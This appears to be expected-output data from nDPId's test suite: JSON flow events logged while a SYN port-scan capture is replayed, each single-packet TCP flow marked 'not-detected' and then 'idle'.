+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1755,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5850,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1755,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1761,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1761,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5859,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5859,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060496,"flow_last_seen":1278275060496,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060496,"flow_last_seen":1278275060496,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7921,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 